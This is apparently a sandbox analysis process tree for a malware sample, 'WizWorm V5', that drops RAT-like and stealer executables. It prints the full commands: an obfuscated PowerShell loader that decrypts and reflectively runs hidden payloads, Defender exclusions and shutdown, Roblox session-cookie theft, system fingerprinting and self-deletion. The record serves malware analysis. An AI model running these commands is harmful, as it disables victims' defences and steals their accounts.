C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2064

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2248

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2960

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:3004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:3012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3032

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3236

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
PID:3404
- C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\WizWorm V5.rar"
  2⤵
  - Modifies registry class
  PID:312
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\WizWorm V5.rar"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4372
- C:\Users\Admin\Desktop\WizWorm V5\WizWorm V5.exe
  "C:\Users\Admin\Desktop\WizWorm V5\WizWorm V5.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4780
- - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
    "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3576
  - - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
      "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4316
    - - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4548
      - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3180
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3332
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        10⤵
        Executes dropped EXE
        
        PID:180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        10⤵
        
        PID:5148
        
        C:\Windows\system32\net.exe
        
        net file
        11⤵
        
        PID:3088
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        12⤵
        
        PID:4852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        11⤵
        Checks computer location settings
        
        PID:5924
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        Checks computer location settings
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        Checks computer location settings
        
        PID:940
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        Checks computer location settings
        
        PID:6140
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        15⤵
        Checks computer location settings
        
        PID:5564
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        16⤵
        
        PID:3412
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        18⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        19⤵
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        20⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        21⤵
        
        PID:5376
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        23⤵
        
        PID:1704
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        24⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        26⤵
        
        PID:2712
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        27⤵
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:5456
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        29⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        30⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        31⤵
        
        PID:6056
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        32⤵
        
        PID:5864
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        33⤵
        
        PID:1788
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        34⤵
        
        PID:1252
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        35⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        36⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        37⤵
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        38⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        39⤵
        
        PID:640
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        40⤵
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        41⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        42⤵
        
        PID:1120
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        43⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        44⤵
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        45⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        46⤵
        
        PID:6112
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        47⤵
        
        PID:5224
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        48⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        49⤵
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        50⤵
        
        PID:3988
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        51⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        52⤵
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        53⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        54⤵
        
        PID:3716
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        55⤵
        
        PID:228
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        56⤵
        
        PID:5496
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        56⤵
        
        PID:3560
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        56⤵
        
        PID:5628
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        57⤵
        
        PID:440
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        57⤵
        Views/modifies file attributes
        
        PID:5908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        55⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        55⤵
        
        PID:1560
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        54⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        54⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        53⤵
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        53⤵
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        52⤵
        
        PID:216
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        52⤵
        
        PID:1324
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        53⤵
        
        PID:4384
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        53⤵
        Views/modifies file attributes
        
        PID:3788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        53⤵
        
        PID:2512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        53⤵
        
        PID:1052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        53⤵
        
        PID:4436
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        53⤵
        
        PID:2596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        53⤵
        
        PID:5292
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        53⤵
        
        PID:5824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        53⤵
        
        PID:5128
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        53⤵
        Detects videocard installed
        
        PID:5448
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        53⤵
        
        PID:5188
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        54⤵
        Runs ping.exe
        
        PID:5784
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        51⤵
        
        PID:5776
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        51⤵
        
        PID:5456
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        50⤵
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        50⤵
        
        PID:1788
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        49⤵
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        49⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        48⤵
        
        PID:3328
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        48⤵
        
        PID:5908
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        47⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        47⤵
        
        PID:6132
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        48⤵
        
        PID:5628
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        48⤵
        Views/modifies file attributes
        
        PID:5408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3788
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        49⤵
        
        PID:5596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        48⤵
        
        PID:4504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        
        PID:5632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        48⤵
        
        PID:5408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        48⤵
        
        PID:2116
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        48⤵
        
        PID:388
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        48⤵
        
        PID:2076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        48⤵
        
        PID:3248
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        48⤵
        Detects videocard installed
        
        PID:412
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        48⤵
        
        PID:3316
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        49⤵
        Runs ping.exe
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        46⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        46⤵
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        45⤵
        
        PID:4636
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        45⤵
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        44⤵
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        44⤵
        
        PID:5752
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:5276
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        45⤵
        Views/modifies file attributes
        
        PID:5140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        45⤵
        
        PID:4300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        
        PID:1388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        
        PID:6056
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        45⤵
        
        PID:5868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        45⤵
        
        PID:6004
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:60
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        45⤵
        
        PID:2168
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        45⤵
        Detects videocard installed
        
        PID:1120
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        46⤵
        
        PID:2508
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        45⤵
        
        PID:4376
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        46⤵
        Runs ping.exe
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        43⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        43⤵
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        42⤵
        
        PID:1660
        
